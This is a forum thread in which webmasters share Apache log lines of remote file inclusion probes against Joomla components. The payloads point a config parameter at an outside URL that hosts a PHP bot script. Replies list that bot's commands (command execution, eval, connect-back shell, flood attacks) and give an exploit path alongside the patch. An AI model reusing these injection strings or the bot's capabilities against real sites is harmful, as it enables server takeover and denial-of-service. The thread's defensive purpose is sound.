Joomla new hacks

B

Bule

Well-Known Member
Joined
Feb 4, 2006
Messages
208
Reaction score
0
Here are some new ones:

67.15.179.3 - - [05/Nov/2008:13:55:14 +0200] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.cr578.com/tx.txt??? HTTP/1.1" 500 933 "-" "libwww-perl/5.814"
77.222.40.189 - - [06/Nov/2008:04:29:51 +0200] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cr578.com/tx.txt??? HTTP/1.1" 500 933 "-" "libwww-perl/5.803"
77.222.40.189 - - [06/Nov/2008:05:13:10 +0200] "GET /components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.cr578.com/tx.txt??? HTTP/1.1" 500 933 "-" "libwww-perl/5.803"

So, if anybody uses any of those components ...
 
this is why I don't use open source software </sarcasm>

there is probably already a patch available to resolve this.

quite an interesting script that it downloads. Appears to be able to download new content, send mail and do DOS attacks. What else could a script-kiddie want...

Code: 
/*
 *
 *  #crew@corp. since 2003
 *  edited by: devil__ and MEIAFASE <[email protected]> <[email protected]>
 *  Friend: LP <****[email protected]>
 *  COMMANDS:
 *
 *  .user <password> //login to the bot
 *  .logout //logout of the bot
 *  .die //kill the bot
 *  .restart //restart the bot
 *  .mail <to> <from> <subject> <msg> //send an email
 *  .dns <IP|HOST> //dns lookup
 *  .download <URL> <filename> //download a file
 *  .exec <cmd> // uses exec() //execute a command
 *  .sexec <cmd> // uses shell_exec() //execute a command
 *  .cmd <cmd> // uses popen() //execute a command
 *  .info //get system information
 *  .php <php code> // uses eval() //execute php code
 *  .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
 *  .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
 *  .raw <cmd> //raw IRC command
 *  .rndnick //change nickname
 *  .pscan <host> <port> //port scan
 *  .safe  // test safe_mode (dvl)
 *  .inbox <to> // test inbox (dvl)
 *  .conback <ip> <port> // conect back (dvl)
 *  .uname // return shell's uname using a php function (dvl)
 *
 */
 
Well, open source is root of all evil. If every South African (including poorest, newborns ...) gives $$$$ or RRRR to Bill world will be much better place for Bill but slightly worse for us.

Apparently there is fix for colorlab:

Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );

--------------------

Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?

--------------------

How to Fix:
1-open admin.colo.php
2-write this codes before wrong codes

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

3-save and exit
 
You must log in or register to reply here.
Back
Top
Sign up to the MyBroadband newsletter
X